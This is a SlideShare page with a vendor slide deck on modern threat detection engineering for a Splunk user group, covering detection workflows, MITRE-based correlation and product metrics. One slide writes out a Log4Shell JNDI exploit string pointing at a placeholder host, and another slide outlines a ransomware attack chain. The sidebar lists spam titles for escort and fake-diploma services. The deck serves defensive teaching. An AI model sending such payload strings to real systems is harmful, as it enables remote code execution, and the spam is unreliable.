SlideShare a Scribd company logo
1 of 17
Download to read offline
ANVILOGIC Inc. C O N F I D E N T I A L
Modernizing Threat Detection Engineering
San Francisco Bay Area Splunk User Group
Virtual Meeting, October 5, 2022
ANVILOGIC Inc. C O N F I D E N T I A L 2
Andrew D’Auria - whoami?
● Director of Sales Engineering at Anvilogic
● Software industry since 1996
● CISSP since 2015
● Splunk, McAfee, Surfcontrol, NetForensics, RSA, and others
● Managing, coaching, and hiring Sales Engineers since 2018
● Native of NYC, living in Wake Forest, NC (Raleigh) since 2007
● Married to Ilissa for 24 years, with 2 daughters Jessica (17)
and Julie (14)
● Will play anything with frets, but especially electric guitar
since 1988
● Love to hike, grill, eat, drink, smoke a pipe/cigar, draw, paint
ANVILOGIC Inc. C O N F I D E N T I A L
Data Science Insights & Models
Core Security Operations Functions
3
Cloud Only
Detection Eng. Mature/Maintain
Accelerated Detection Insights, Improve
Purple Team / Threat Research
Hunt
Become Proactive
Triage
Smarter, Faster Analysis
Respond
Automate Response
ANVILOGIC Inc. C O N F I D E N T I A L 4
Detection Engineering - The Current Way
1. Manual Research
(ex. Google, Github)
Identify Threat Research 48 hr
2. Track / Feedback
(ex. JIRA)
Create Ticket 1 hr
3. Develop, Test, Deploy
(ex. SIEM)
Build Test
4. Document Use Case
(ex. Confluence)
Runbook 3 hr
Deploy 20 hr
5. Metrics & Reporting
(ex. Qlikview)
Maintain/Tune KPIs
Disjoint
People,
Process,
Technology
Start
End
3-5
Days Each
2-3+
Teams
5+
Tools
x 3
Times
=
+15D
Log4Shell Attack (3 Use
Cases (exploit, .exe, C2)
ANVILOGIC Inc. C O N F I D E N T I A L 5
1
Detection engineering is
● slow
● difficult
● results in noisy false
positives delivered to
the SOC
2 3
Bringing all data into a
centralized SIEM data
store is
● expensive
● difficult
especially in hybrid
cloud environments
There is no good way to
● track MITRE ATT&CK
technique coverage
● measure maturity
progress in real time
● identify gaps and
measure risk
What are the problems with detection engineering today?
ANVILOGIC Inc. C O N F I D E N T I A L
How can we measure the effectiveness of our DE program?
6
Collection
Detection
Response
• Data Coverage
• Data Quality
• Data Availability
• Detection Coverage
• Detection Quality
• Lifecycle Management
• Alert Management
• Workflow
• Speed
• Accuracy
Strategic Maturity
How Are We Performing?
How Can We Perform Better?
Where Can We Perform Better?
Organizational Risk?
Industry-Specific Risk?
Technology-Specific Risk?
Communicating Value?
Operational Maturity
ANVILOGIC Inc. C O N F I D E N T I A L
Typical vs. Ideal Detection → Pyramid of Pain
Typical
• IOC Driven
• Very time limited
• Lack of Context
• Whack-a-mole
Image Source: David Bianco’s blog - http://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html
Ideal
• Tool & Behavior
Driven
• Very hard for
adversaries to change
• Long term strategic
value for detections
ANVILOGIC Inc. C O N F I D E N T I A L
Content 2.0
8
Events
Events of
Interest
Alerts
Traditional
Alerts
Threat Scenarios
Risk Thresholds
ANVILOGIC Inc. C O N F I D E N T I A L
Threat Identifiers and Threat Scenarios
9
Threat Scenario
Entity ‘X' Entity ‘X' Entity ‘X'
+ +
Threat Identifier
Event ID = “1234”
AND
(Process Name = “XYZ”
OR
Process Name = “ABC”)
Events of Interest
Event of Interest “A”
AND (60 Minutes)
Event of Interest “B”
AND (5 hours)
Event of Interest “C”
ANVILOGIC Inc. C O N F I D E N T I A L
Hunting Index - AKA: Events of Interest
● Correlating TTPs or Events of Interest
ANVILOGIC Inc. C O N F I D E N T I A L
Modern Security Operations
11
Hunt &
Correlate
Tag, Normalize,
Enrich
Case/Ticketing
& SOAR
Detection Engineering, Alerting, Triage, Hunting, and Response
Across Modern Hybrid Data Environments
Analyst Activity
Triage Threat
Scenarios
Auto-Threat
Detection
No Code -
Build Rules
Detection
Recommendations
Security & IT Products
(ex. EDR, AV, Cloud)
Logs
Logging Platforms
(ex. Splunk, Snowflake, Azure)
Query & Import
API
Query
API
Pull
API Store
Identifiers
(EOIs)
Demo...
ANVILOGIC Inc. C O N F I D E N T I A L 13
Example: Log4Shell Attack Pattern
Attacker Victim Security Operations Center Response
{$jndi:ldap://1.2.3.4/Exploit}
1
2
java.exe <Payload Class>
3
Establish C2
Detection
Engineers
Research, Test,
Document, Deploy
Alert 3
1000s alerts Alert 1
Alert 2
SOC
Triage
3-5
Days
Build MITRE Attack Detections
1 2 3
+ +
Easy Correlation -
No Code Required!
Initial Access Execution C2
Workspace
& Tasks
Track
Tune,
Versions
Test,
Deploy
Improve,
Mature
Maintain
Research
Exploit in Lab
Develop, Test,
Share
Threat Research
Reduce Alert Volume,
Improve Dwell Time
Attack Scenario
1 2 3
+ +
Triage
Under
2
Hours
Anvilogic Platform for Threat Detection, Investigation, and Response (TDIR)
ANVILOGIC Inc. C O N F I D E N T I A L
1
4
Example: Ransomware Attack Pattern
Start
Windows Macro
Execution
An employee opens a
malicious attachment
that runs a macro
Stage 1: Initial Access
1
Cobalt Strike
Abnormal Web
Connection
Machine makes abnormal
web connection to malware
payload domain and
establishes persistence
+60m
3
Stage 3: Command & Control
Stage 2: Installation
Encoded PowerShell
Command
Macro spawns an
encoded command in
powershell
+30s
2
Word Doc
Last Chance
to Detect!
Stage 4: Discovery
AD Find
Execution
Attacker uses adfind to
gather active directory
information for internal
reconnaissance
+60m
Batch File
</>
4
4 Rules 1 Correlation How Long?
+ =
+
ANVILOGIC Inc. C O N F I D E N T I A L 15
Anvilogic Impacts - 50B Financial Services
+180
EDR RULES
111
CLOUD
97
ENDPOINT
31
WEB
+403
CUSTOM
55
Azure Rules
Improved by +31%
20
AWS Rules
Improved by +75%
12
GCP Rules
Improved by +17%
24
O365 Rules
Improved by +21%
12
Proxy Rules
Improved by +30%
19
Web App Rules
Improved by +40%
55
Windows Rules
Improved by +55%
42
Linux Rules
Improved by +90%
180
EDR Rules
Linux & Windows
51
SCENARIOS
239
IDENTIFIERS
17
MACROS
8.14M
Warnings
300+
Identifiers
351
Alerts
10+
Scenarios
8.1T
Raw Events
4,000+
Sourcetypes
USE CASES
454
DEPLOYED
5.8
Alerts per day
UPLOADS
DOWNLOADS
~2m
● Increased Overall Detections by 91%
● Saved up to 6,500+ hours of engineering time
Anvilogic Framework Impacts
(60 Days)
ANVILOGIC Inc. C O N F I D E N T I A L
Key Takeaways
& Next Steps
● Effective detection engineering requires good
data, process, and measurement
● Not every detection requires an alert or action
● Build effective detections based on real-world
attack scenarios and risk thresholds
● Pyramid of pain whitepaper
https://www.anvilogic.com/learn/whitepaper-
pyramid-apex
● Subscribe to our Threat Report
anvilogic.com/resources/threat-report
Thank You!
adauria@anvilogic.com
anvilogic.com/resources/threat-report
https://www.anvilogic.com/learn/whitepaper-pyramid-apex

More Related Content

Similar to SF Bay Area Splunk User Group Meeting October 5, 2022

SplunkLive! Stockholm 2015 breakout - Analytics based security
SplunkLive! Stockholm 2015 breakout - Analytics based securitySplunkLive! Stockholm 2015 breakout - Analytics based security
SplunkLive! Stockholm 2015 breakout - Analytics based securitySplunk
 
Splunk for Enterprise Security Featuring UBA
Splunk for Enterprise Security Featuring UBASplunk for Enterprise Security Featuring UBA
Splunk for Enterprise Security Featuring UBASplunk
 
Threat Modeling All Day!
Threat Modeling All Day!Threat Modeling All Day!
Threat Modeling All Day!Steven Carlson
 
Travis Perkins: Building a 'Lean SOC' over 'Legacy SOC'
Travis Perkins: Building a 'Lean SOC' over 'Legacy SOC'Travis Perkins: Building a 'Lean SOC' over 'Legacy SOC'
Travis Perkins: Building a 'Lean SOC' over 'Legacy SOC'Splunk
 
Splunk for Enterprise Security featuring UBA Breakout Session
Splunk for Enterprise Security featuring UBA Breakout SessionSplunk for Enterprise Security featuring UBA Breakout Session
Splunk for Enterprise Security featuring UBA Breakout SessionSplunk
 
Security Breakout Session
Security Breakout Session Security Breakout Session
Security Breakout Session Splunk
 
Behind the Curtain: Exposing Advanced Threats
Behind the Curtain: Exposing Advanced ThreatsBehind the Curtain: Exposing Advanced Threats
Behind the Curtain: Exposing Advanced ThreatsCisco Canada
 
Making Security Agile - Oleg Gryb
Making Security Agile - Oleg GrybMaking Security Agile - Oleg Gryb
Making Security Agile - Oleg GrybSeniorStoryteller
 
Solnet dev secops meetup
Solnet dev secops meetupSolnet dev secops meetup
Solnet dev secops meetuppbink
 
Splunk Enterpise for Information Security Hands-On
Splunk Enterpise for Information Security Hands-OnSplunk Enterpise for Information Security Hands-On
Splunk Enterpise for Information Security Hands-OnSplunk
 
2014-12-16 defense news - shutdown the hackers
2014-12-16  defense news - shutdown the hackers2014-12-16  defense news - shutdown the hackers
2014-12-16 defense news - shutdown the hackersShawn Wells
 
Malware Most Wanted: Security Ecosystem
Malware Most Wanted: Security EcosystemMalware Most Wanted: Security Ecosystem
Malware Most Wanted: Security EcosystemCyphort
 
SplunkSummit 2015 - Splunk User Behavioral Analytics
SplunkSummit 2015 - Splunk User Behavioral AnalyticsSplunkSummit 2015 - Splunk User Behavioral Analytics
SplunkSummit 2015 - Splunk User Behavioral AnalyticsSplunk
 
Elizabeth Lawler - Devops, security, and compliance working in unison
Elizabeth Lawler - Devops, security, and compliance working in unisonElizabeth Lawler - Devops, security, and compliance working in unison
Elizabeth Lawler - Devops, security, and compliance working in unisonDevSecCon
 
IntelFlow: Toward adding Cyber Threat Intelligence to Software Defined Networ...
IntelFlow: Toward adding Cyber Threat Intelligence to Software Defined Networ...IntelFlow: Toward adding Cyber Threat Intelligence to Software Defined Networ...
IntelFlow: Toward adding Cyber Threat Intelligence to Software Defined Networ...Open Networking Perú (Opennetsoft)
 
SplunkLive! Amsterdam 2015 - Analytics based security breakout
SplunkLive! Amsterdam 2015 - Analytics based security breakoutSplunkLive! Amsterdam 2015 - Analytics based security breakout
SplunkLive! Amsterdam 2015 - Analytics based security breakoutSplunk
 
AWS live hack: Atlassian + Snyk OSS on AWS
AWS live hack: Atlassian + Snyk OSS on AWSAWS live hack: Atlassian + Snyk OSS on AWS
AWS live hack: Atlassian + Snyk OSS on AWSEric Smalling
 
Who owns Software Security
Who owns Software SecurityWho owns Software Security
Who owns Software SecuritydevObjective
 

Similar to SF Bay Area Splunk User Group Meeting October 5, 2022 (20)

SplunkLive! Stockholm 2015 breakout - Analytics based security
SplunkLive! Stockholm 2015 breakout - Analytics based securitySplunkLive! Stockholm 2015 breakout - Analytics based security
SplunkLive! Stockholm 2015 breakout - Analytics based security
 
Splunk for Enterprise Security Featuring UBA
Splunk for Enterprise Security Featuring UBASplunk for Enterprise Security Featuring UBA
Splunk for Enterprise Security Featuring UBA
 
Threat Modeling All Day!
Threat Modeling All Day!Threat Modeling All Day!
Threat Modeling All Day!
 
The Future of DevSecOps
The Future of DevSecOpsThe Future of DevSecOps
The Future of DevSecOps
 
Travis Perkins: Building a 'Lean SOC' over 'Legacy SOC'
Travis Perkins: Building a 'Lean SOC' over 'Legacy SOC'Travis Perkins: Building a 'Lean SOC' over 'Legacy SOC'
Travis Perkins: Building a 'Lean SOC' over 'Legacy SOC'
 
Splunk for Enterprise Security featuring UBA Breakout Session
Splunk for Enterprise Security featuring UBA Breakout SessionSplunk for Enterprise Security featuring UBA Breakout Session
Splunk for Enterprise Security featuring UBA Breakout Session
 
Security Breakout Session
Security Breakout Session Security Breakout Session
Security Breakout Session
 
Behind the Curtain: Exposing Advanced Threats
Behind the Curtain: Exposing Advanced ThreatsBehind the Curtain: Exposing Advanced Threats
Behind the Curtain: Exposing Advanced Threats
 
Making Security Agile - Oleg Gryb
Making Security Agile - Oleg GrybMaking Security Agile - Oleg Gryb
Making Security Agile - Oleg Gryb
 
Solnet dev secops meetup
Solnet dev secops meetupSolnet dev secops meetup
Solnet dev secops meetup
 
Splunk Enterpise for Information Security Hands-On
Splunk Enterpise for Information Security Hands-OnSplunk Enterpise for Information Security Hands-On
Splunk Enterpise for Information Security Hands-On
 
2014-12-16 defense news - shutdown the hackers
2014-12-16  defense news - shutdown the hackers2014-12-16  defense news - shutdown the hackers
2014-12-16 defense news - shutdown the hackers
 
Malware Most Wanted: Security Ecosystem
Malware Most Wanted: Security EcosystemMalware Most Wanted: Security Ecosystem
Malware Most Wanted: Security Ecosystem
 
SplunkSummit 2015 - Splunk User Behavioral Analytics
SplunkSummit 2015 - Splunk User Behavioral AnalyticsSplunkSummit 2015 - Splunk User Behavioral Analytics
SplunkSummit 2015 - Splunk User Behavioral Analytics
 
Elizabeth Lawler - Devops, security, and compliance working in unison
Elizabeth Lawler - Devops, security, and compliance working in unisonElizabeth Lawler - Devops, security, and compliance working in unison
Elizabeth Lawler - Devops, security, and compliance working in unison
 
IntelFlow: Toward adding Cyber Threat Intelligence to Software Defined Networ...
IntelFlow: Toward adding Cyber Threat Intelligence to Software Defined Networ...IntelFlow: Toward adding Cyber Threat Intelligence to Software Defined Networ...
IntelFlow: Toward adding Cyber Threat Intelligence to Software Defined Networ...
 
SplunkLive! Amsterdam 2015 - Analytics based security breakout
SplunkLive! Amsterdam 2015 - Analytics based security breakoutSplunkLive! Amsterdam 2015 - Analytics based security breakout
SplunkLive! Amsterdam 2015 - Analytics based security breakout
 
AWS live hack: Atlassian + Snyk OSS on AWS
AWS live hack: Atlassian + Snyk OSS on AWSAWS live hack: Atlassian + Snyk OSS on AWS
AWS live hack: Atlassian + Snyk OSS on AWS
 
Who owns Software Security
Who owns Software SecurityWho owns Software Security
Who owns Software Security
 
Who Owns Software Security?
Who Owns Software Security?Who Owns Software Security?
Who Owns Software Security?
 

More from Becky Burwell

SFBA Splunk Usergroup meeting March 13, 2024
SFBA Splunk Usergroup meeting March 13, 2024SFBA Splunk Usergroup meeting March 13, 2024
SFBA Splunk Usergroup meeting March 13, 2024Becky Burwell
 
SFBA Splunk Usergroup meeting December 14, 2023
SFBA Splunk Usergroup meeting December 14, 2023SFBA Splunk Usergroup meeting December 14, 2023
SFBA Splunk Usergroup meeting December 14, 2023Becky Burwell
 
SFBA_SUG_2023-08-02.pdf
SFBA_SUG_2023-08-02.pdfSFBA_SUG_2023-08-02.pdf
SFBA_SUG_2023-08-02.pdfBecky Burwell
 
SFBA Splunk Usergroup meeting May 3, 2023
SFBA Splunk Usergroup meeting May 3, 2023SFBA Splunk Usergroup meeting May 3, 2023
SFBA Splunk Usergroup meeting May 3, 2023Becky Burwell
 
SFBA Splunk User Group Meeting February 2023
SFBA Splunk User Group Meeting February 2023SFBA Splunk User Group Meeting February 2023
SFBA Splunk User Group Meeting February 2023Becky Burwell
 
SFBA Splunk Usergroup meeting December 2022
SFBA Splunk Usergroup meeting December 2022SFBA Splunk Usergroup meeting December 2022
SFBA Splunk Usergroup meeting December 2022Becky Burwell
 
SFBA Usergroup meeting November 2, 2022
SFBA Usergroup meeting November 2, 2022SFBA Usergroup meeting November 2, 2022
SFBA Usergroup meeting November 2, 2022Becky Burwell
 
SFBA Splunk User Group Meeting August 10, 2022
SFBA Splunk User Group Meeting August 10, 2022SFBA Splunk User Group Meeting August 10, 2022
SFBA Splunk User Group Meeting August 10, 2022Becky Burwell
 
SFBA Splunk Usergroup meeting July 13, 2022
SFBA Splunk Usergroup meeting July 13, 2022SFBA Splunk Usergroup meeting July 13, 2022
SFBA Splunk Usergroup meeting July 13, 2022Becky Burwell
 
designing-resilient-cloud-native-splunk-arch-in-aws-austin-rose.pdf
designing-resilient-cloud-native-splunk-arch-in-aws-austin-rose.pdfdesigning-resilient-cloud-native-splunk-arch-in-aws-austin-rose.pdf
designing-resilient-cloud-native-splunk-arch-in-aws-austin-rose.pdfBecky Burwell
 
Splunking configfiles 20211208_daniel_wilson
Splunking configfiles 20211208_daniel_wilsonSplunking configfiles 20211208_daniel_wilson
Splunking configfiles 20211208_daniel_wilsonBecky Burwell
 
Getting Started with Splunk Observability September 8, 2021
Getting Started with Splunk Observability September 8, 2021Getting Started with Splunk Observability September 8, 2021
Getting Started with Splunk Observability September 8, 2021Becky Burwell
 
Advanced Outlier Detection and Noise Reduction with Splunk & MLTK August 11, ...
Advanced Outlier Detection and Noise Reduction with Splunk & MLTK August 11, ...Advanced Outlier Detection and Noise Reduction with Splunk & MLTK August 11, ...
Advanced Outlier Detection and Noise Reduction with Splunk & MLTK August 11, ...Becky Burwell
 

More from Becky Burwell (13)

SFBA Splunk Usergroup meeting March 13, 2024
SFBA Splunk Usergroup meeting March 13, 2024SFBA Splunk Usergroup meeting March 13, 2024
SFBA Splunk Usergroup meeting March 13, 2024
 
SFBA Splunk Usergroup meeting December 14, 2023
SFBA Splunk Usergroup meeting December 14, 2023SFBA Splunk Usergroup meeting December 14, 2023
SFBA Splunk Usergroup meeting December 14, 2023
 
SFBA_SUG_2023-08-02.pdf
SFBA_SUG_2023-08-02.pdfSFBA_SUG_2023-08-02.pdf
SFBA_SUG_2023-08-02.pdf
 
SFBA Splunk Usergroup meeting May 3, 2023
SFBA Splunk Usergroup meeting May 3, 2023SFBA Splunk Usergroup meeting May 3, 2023
SFBA Splunk Usergroup meeting May 3, 2023
 
SFBA Splunk User Group Meeting February 2023
SFBA Splunk User Group Meeting February 2023SFBA Splunk User Group Meeting February 2023
SFBA Splunk User Group Meeting February 2023
 
SFBA Splunk Usergroup meeting December 2022
SFBA Splunk Usergroup meeting December 2022SFBA Splunk Usergroup meeting December 2022
SFBA Splunk Usergroup meeting December 2022
 
SFBA Usergroup meeting November 2, 2022
SFBA Usergroup meeting November 2, 2022SFBA Usergroup meeting November 2, 2022
SFBA Usergroup meeting November 2, 2022
 
SFBA Splunk User Group Meeting August 10, 2022
SFBA Splunk User Group Meeting August 10, 2022SFBA Splunk User Group Meeting August 10, 2022
SFBA Splunk User Group Meeting August 10, 2022
 
SFBA Splunk Usergroup meeting July 13, 2022
SFBA Splunk Usergroup meeting July 13, 2022SFBA Splunk Usergroup meeting July 13, 2022
SFBA Splunk Usergroup meeting July 13, 2022
 
designing-resilient-cloud-native-splunk-arch-in-aws-austin-rose.pdf
designing-resilient-cloud-native-splunk-arch-in-aws-austin-rose.pdfdesigning-resilient-cloud-native-splunk-arch-in-aws-austin-rose.pdf
designing-resilient-cloud-native-splunk-arch-in-aws-austin-rose.pdf
 
Splunking configfiles 20211208_daniel_wilson
Splunking configfiles 20211208_daniel_wilsonSplunking configfiles 20211208_daniel_wilson
Splunking configfiles 20211208_daniel_wilson
 
Getting Started with Splunk Observability September 8, 2021
Getting Started with Splunk Observability September 8, 2021Getting Started with Splunk Observability September 8, 2021
Getting Started with Splunk Observability September 8, 2021
 
Advanced Outlier Detection and Noise Reduction with Splunk & MLTK August 11, ...
Advanced Outlier Detection and Noise Reduction with Splunk & MLTK August 11, ...Advanced Outlier Detection and Noise Reduction with Splunk & MLTK August 11, ...
Advanced Outlier Detection and Noise Reduction with Splunk & MLTK August 11, ...
 

Recently uploaded

Call Girls In Mahipalpur O9654467111 Escorts Service
Call Girls In Mahipalpur O9654467111  Escorts ServiceCall Girls In Mahipalpur O9654467111  Escorts Service
Call Girls In Mahipalpur O9654467111 Escorts ServiceSapana Sha
 
dokumen.tips_chapter-4-transient-heat-conduction-mehmet-kanoglu.ppt
dokumen.tips_chapter-4-transient-heat-conduction-mehmet-kanoglu.pptdokumen.tips_chapter-4-transient-heat-conduction-mehmet-kanoglu.ppt
dokumen.tips_chapter-4-transient-heat-conduction-mehmet-kanoglu.pptSonatrach
 
From idea to production in a day – Leveraging Azure ML and Streamlit to build...
From idea to production in a day – Leveraging Azure ML and Streamlit to build...From idea to production in a day – Leveraging Azure ML and Streamlit to build...
From idea to production in a day – Leveraging Azure ML and Streamlit to build...Florian Roscheck
 
Unveiling Insights: The Role of a Data Analyst
Unveiling Insights: The Role of a Data AnalystUnveiling Insights: The Role of a Data Analyst
Unveiling Insights: The Role of a Data AnalystSamantha Rae Coolbeth
 
04242024_CCC TUG_Joins and Relationships
04242024_CCC TUG_Joins and Relationships04242024_CCC TUG_Joins and Relationships
04242024_CCC TUG_Joins and Relationshipsccctableauusergroup
 
Customer Service Analytics - Make Sense of All Your Data.pptx
Customer Service Analytics - Make Sense of All Your Data.pptxCustomer Service Analytics - Make Sense of All Your Data.pptx
Customer Service Analytics - Make Sense of All Your Data.pptxEmmanuel Dauda
 
100-Concepts-of-AI by Anupama Kate .pptx
100-Concepts-of-AI by Anupama Kate .pptx100-Concepts-of-AI by Anupama Kate .pptx
100-Concepts-of-AI by Anupama Kate .pptxAnupama Kate
 
{Pooja: 9892124323 } Call Girl in Mumbai | Jas Kaur Rate 4500 Free Hotel Del...
{Pooja:  9892124323 } Call Girl in Mumbai | Jas Kaur Rate 4500 Free Hotel Del...{Pooja:  9892124323 } Call Girl in Mumbai | Jas Kaur Rate 4500 Free Hotel Del...
{Pooja: 9892124323 } Call Girl in Mumbai | Jas Kaur Rate 4500 Free Hotel Del...Pooja Nehwal
 
代办国外大学文凭《原版美国UCLA文凭证书》加州大学洛杉矶分校毕业证制作成绩单修改
代办国外大学文凭《原版美国UCLA文凭证书》加州大学洛杉矶分校毕业证制作成绩单修改代办国外大学文凭《原版美国UCLA文凭证书》加州大学洛杉矶分校毕业证制作成绩单修改
代办国外大学文凭《原版美国UCLA文凭证书》加州大学洛杉矶分校毕业证制作成绩单修改atducpo
 
VIP High Class Call Girls Bikaner Anushka 8250192130 Independent Escort Servi...
VIP High Class Call Girls Bikaner Anushka 8250192130 Independent Escort Servi...VIP High Class Call Girls Bikaner Anushka 8250192130 Independent Escort Servi...
VIP High Class Call Girls Bikaner Anushka 8250192130 Independent Escort Servi...Suhani Kapoor
 
Beautiful Sapna Vip Call Girls Hauz Khas 9711199012 Call /Whatsapps
Beautiful Sapna Vip  Call Girls Hauz Khas 9711199012 Call /WhatsappsBeautiful Sapna Vip  Call Girls Hauz Khas 9711199012 Call /Whatsapps
Beautiful Sapna Vip Call Girls Hauz Khas 9711199012 Call /Whatsappssapnasaifi408
 
Call Girls In Noida City Center Metro 24/7✡️9711147426✡️ Escorts Service
Call Girls In Noida City Center Metro 24/7✡️9711147426✡️ Escorts ServiceCall Girls In Noida City Center Metro 24/7✡️9711147426✡️ Escorts Service
Call Girls In Noida City Center Metro 24/7✡️9711147426✡️ Escorts Servicejennyeacort
 
Delhi Call Girls Punjabi Bagh 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Punjabi Bagh 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip CallDelhi Call Girls Punjabi Bagh 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Punjabi Bagh 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Callshivangimorya083
 
VIP Call Girls Service Miyapur Hyderabad Call +91-8250192130
VIP Call Girls Service Miyapur Hyderabad Call +91-8250192130VIP Call Girls Service Miyapur Hyderabad Call +91-8250192130
VIP Call Girls Service Miyapur Hyderabad Call +91-8250192130Suhani Kapoor
 
Data Warehouse , Data Cube Computation
Data Warehouse   , Data Cube ComputationData Warehouse   , Data Cube Computation
Data Warehouse , Data Cube Computationsit20ad004
 
Call Girls in Defence Colony Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Defence Colony Delhi 💯Call Us 🔝8264348440🔝Call Girls in Defence Colony Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Defence Colony Delhi 💯Call Us 🔝8264348440🔝soniya singh
 
B2 Creative Industry Response Evaluation.docx
B2 Creative Industry Response Evaluation.docxB2 Creative Industry Response Evaluation.docx
B2 Creative Industry Response Evaluation.docxStephen266013
 
Building on a FAIRly Strong Foundation to Connect Academic Research to Transl...
Building on a FAIRly Strong Foundation to Connect Academic Research to Transl...Building on a FAIRly Strong Foundation to Connect Academic Research to Transl...
Building on a FAIRly Strong Foundation to Connect Academic Research to Transl...Jack DiGiovanna
 
Dubai Call Girls Wifey O52&786472 Call Girls Dubai
Dubai Call Girls Wifey O52&786472 Call Girls DubaiDubai Call Girls Wifey O52&786472 Call Girls Dubai
Dubai Call Girls Wifey O52&786472 Call Girls Dubaihf8803863
 

Recently uploaded (20)

Call Girls In Mahipalpur O9654467111 Escorts Service
Call Girls In Mahipalpur O9654467111  Escorts ServiceCall Girls In Mahipalpur O9654467111  Escorts Service
Call Girls In Mahipalpur O9654467111 Escorts Service
 
dokumen.tips_chapter-4-transient-heat-conduction-mehmet-kanoglu.ppt
dokumen.tips_chapter-4-transient-heat-conduction-mehmet-kanoglu.pptdokumen.tips_chapter-4-transient-heat-conduction-mehmet-kanoglu.ppt
dokumen.tips_chapter-4-transient-heat-conduction-mehmet-kanoglu.ppt
 
From idea to production in a day – Leveraging Azure ML and Streamlit to build...
From idea to production in a day – Leveraging Azure ML and Streamlit to build...From idea to production in a day – Leveraging Azure ML and Streamlit to build...
From idea to production in a day – Leveraging Azure ML and Streamlit to build...
 
Unveiling Insights: The Role of a Data Analyst
Unveiling Insights: The Role of a Data AnalystUnveiling Insights: The Role of a Data Analyst
Unveiling Insights: The Role of a Data Analyst
 
04242024_CCC TUG_Joins and Relationships
04242024_CCC TUG_Joins and Relationships04242024_CCC TUG_Joins and Relationships
04242024_CCC TUG_Joins and Relationships
 
Customer Service Analytics - Make Sense of All Your Data.pptx
Customer Service Analytics - Make Sense of All Your Data.pptxCustomer Service Analytics - Make Sense of All Your Data.pptx
Customer Service Analytics - Make Sense of All Your Data.pptx
 
100-Concepts-of-AI by Anupama Kate .pptx
100-Concepts-of-AI by Anupama Kate .pptx100-Concepts-of-AI by Anupama Kate .pptx
100-Concepts-of-AI by Anupama Kate .pptx
 
{Pooja: 9892124323 } Call Girl in Mumbai | Jas Kaur Rate 4500 Free Hotel Del...
{Pooja:  9892124323 } Call Girl in Mumbai | Jas Kaur Rate 4500 Free Hotel Del...{Pooja:  9892124323 } Call Girl in Mumbai | Jas Kaur Rate 4500 Free Hotel Del...
{Pooja: 9892124323 } Call Girl in Mumbai | Jas Kaur Rate 4500 Free Hotel Del...
 
代办国外大学文凭《原版美国UCLA文凭证书》加州大学洛杉矶分校毕业证制作成绩单修改
代办国外大学文凭《原版美国UCLA文凭证书》加州大学洛杉矶分校毕业证制作成绩单修改代办国外大学文凭《原版美国UCLA文凭证书》加州大学洛杉矶分校毕业证制作成绩单修改
代办国外大学文凭《原版美国UCLA文凭证书》加州大学洛杉矶分校毕业证制作成绩单修改
 
VIP High Class Call Girls Bikaner Anushka 8250192130 Independent Escort Servi...
VIP High Class Call Girls Bikaner Anushka 8250192130 Independent Escort Servi...VIP High Class Call Girls Bikaner Anushka 8250192130 Independent Escort Servi...
VIP High Class Call Girls Bikaner Anushka 8250192130 Independent Escort Servi...
 
VIP Call Girls Service Charbagh { Lucknow Call Girls Service 9548273370 } Boo...
VIP Call Girls Service Charbagh { Lucknow Call Girls Service 9548273370 } Boo...VIP Call Girls Service Charbagh { Lucknow Call Girls Service 9548273370 } Boo...
VIP Call Girls Service Charbagh { Lucknow Call Girls Service 9548273370 } Boo...
 
Beautiful Sapna Vip Call Girls Hauz Khas 9711199012 Call /Whatsapps
Beautiful Sapna Vip  Call Girls Hauz Khas 9711199012 Call /WhatsappsBeautiful Sapna Vip  Call Girls Hauz Khas 9711199012 Call /Whatsapps
Beautiful Sapna Vip Call Girls Hauz Khas 9711199012 Call /Whatsapps
 
Call Girls In Noida City Center Metro 24/7✡️9711147426✡️ Escorts Service
Call Girls In Noida City Center Metro 24/7✡️9711147426✡️ Escorts ServiceCall Girls In Noida City Center Metro 24/7✡️9711147426✡️ Escorts Service
Call Girls In Noida City Center Metro 24/7✡️9711147426✡️ Escorts Service
 
Delhi Call Girls Punjabi Bagh 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Punjabi Bagh 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip CallDelhi Call Girls Punjabi Bagh 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Punjabi Bagh 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
 
VIP Call Girls Service Miyapur Hyderabad Call +91-8250192130
VIP Call Girls Service Miyapur Hyderabad Call +91-8250192130VIP Call Girls Service Miyapur Hyderabad Call +91-8250192130
VIP Call Girls Service Miyapur Hyderabad Call +91-8250192130
 
Data Warehouse , Data Cube Computation
Data Warehouse   , Data Cube ComputationData Warehouse   , Data Cube Computation
Data Warehouse , Data Cube Computation
 
Call Girls in Defence Colony Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Defence Colony Delhi 💯Call Us 🔝8264348440🔝Call Girls in Defence Colony Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Defence Colony Delhi 💯Call Us 🔝8264348440🔝
 
B2 Creative Industry Response Evaluation.docx
B2 Creative Industry Response Evaluation.docxB2 Creative Industry Response Evaluation.docx
B2 Creative Industry Response Evaluation.docx
 
Building on a FAIRly Strong Foundation to Connect Academic Research to Transl...
Building on a FAIRly Strong Foundation to Connect Academic Research to Transl...Building on a FAIRly Strong Foundation to Connect Academic Research to Transl...
Building on a FAIRly Strong Foundation to Connect Academic Research to Transl...
 
Dubai Call Girls Wifey O52&786472 Call Girls Dubai
Dubai Call Girls Wifey O52&786472 Call Girls DubaiDubai Call Girls Wifey O52&786472 Call Girls Dubai
Dubai Call Girls Wifey O52&786472 Call Girls Dubai
 

SF Bay Area Splunk User Group Meeting October 5, 2022

  • 1. ANVILOGIC Inc. C O N F I D E N T I A L Modernizing Threat Detection Engineering San Francisco Bay Area Splunk User Group Virtual Meeting, October 5, 2022
